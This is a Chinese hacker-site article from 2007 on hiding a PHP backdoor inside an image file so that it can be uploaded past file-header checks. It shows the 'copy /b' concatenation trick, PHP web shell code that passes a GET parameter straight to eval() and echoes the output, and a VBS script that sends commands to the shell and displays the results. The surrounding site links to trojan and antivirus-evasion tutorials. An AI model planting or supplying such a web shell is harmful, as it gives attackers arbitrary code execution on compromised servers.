黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 木马天地 >> 文章正文
[推荐]php后门插在图片里执行回显思路
        ★★★★★
php后门插在图片里执行回显思路
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-4-6

有的网站不检查后缀格式,但检查文件头很严格,gif89a根本骗不过去,只能copy/b 1.gif+1.php 2.php这样.但一句话php木马或inulcde之类的就不会有回显了.而且把php代码插在图片里,如果不知那个网站目录有写权限的话,也很难写文件上去.
当然用NC抓包提交可以看到回显,但是太罗嗦了.下边的代码只能算个poc了.
php:

以下是引用片段:
<html><body bgcolor="008888">
<font face='arial' size='3'>
COMMANDE PHP :
(pas de ";" ?la fin )
<form method="get" action="commande.php">
<?
$com=stripslashes($com);
echo"<input type=text size='100' name=com >";
?>
</form>
<?
echo "<font face='arial' size='3' color='lime'><b><i>$com</b></i></font> <br>";
$result=eval($com.";");
echo"<br><br> et <b>$result</b> " ;
?>
</body></html>

vbs:

以下是引用片段:
url=URLEncoding(Wscript.Arguments(0))
Set oXMLHttpRequest = CreateObject("Msxml2.XMLHTTP")
oXMLHttpRequest.Open "GET", url, False, False
oXMLHttpRequest.Send
'str=oXMLHttpRequest.responsebody
set aso=createobject("Adodb.Stream")
aso.open
aso.type=1
aso.write oXMLHttpRequest.responsebody
aso.saveToFile "c:\ok.htm",2
aso.close
Set WshShell = Wscript.CreateObject("Wscript.Shell")
WshShell.Run ("C:\Progra~1\Intern~1\IEXPLORE.EXE "&"c:\ok.htm")
Function URLEncoding(vstrIn)
strReturn = ""
Dim i
For i = 1 To Len(vstrIn)
ThisChr = Mid(vstrIn, i, 1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00) \ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
strReturn = Replace(strReturn, Chr(32), "%20")
URLEncoding = strReturn
End Function

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章: 没有了
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    2007年IE 0day 网马04-02
    修改特征码打造免杀后门之灰鸽子04-02
    挂马代码大全03-22
    打造不死的asp木马03-21
    木马免杀原理详解01-31
    新编MS07004网页木马源码01-27
    灰鸽子VIP2006服务端过各种杀毒软01-26
    木马免杀之加壳与改入口点法01-23
    灰鸽子超级详细教程(看了就会)01-16
    灰鸽子远程管理软件新手技术手册12-27
    二个非常规ASP木马12-13
    木马免杀浓缩精华版教程不看后悔12-05
    相 关 文 章
  • PHP注入代码详解

  • CreatingOnline在线免费图片编辑器

  • 修改特征码打造免杀后门之灰鸽子篇

  • windows自带的rcmd后门使用方法整理

  • 躲避ScanWebShell的一个后门

  • windows自带的rcmd后门使用方法整理

  • 最新.aspx微型后门代码

  • ImageVenue免费图片上传空间,不用注册

  • 1MajorHost免费php空间,支持MySQL/FTP

  • PHP注入代码详解

  • 菜鸟"搜"大量Web Shell的思路

  • 教你写带后门的软件[VB编程]

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886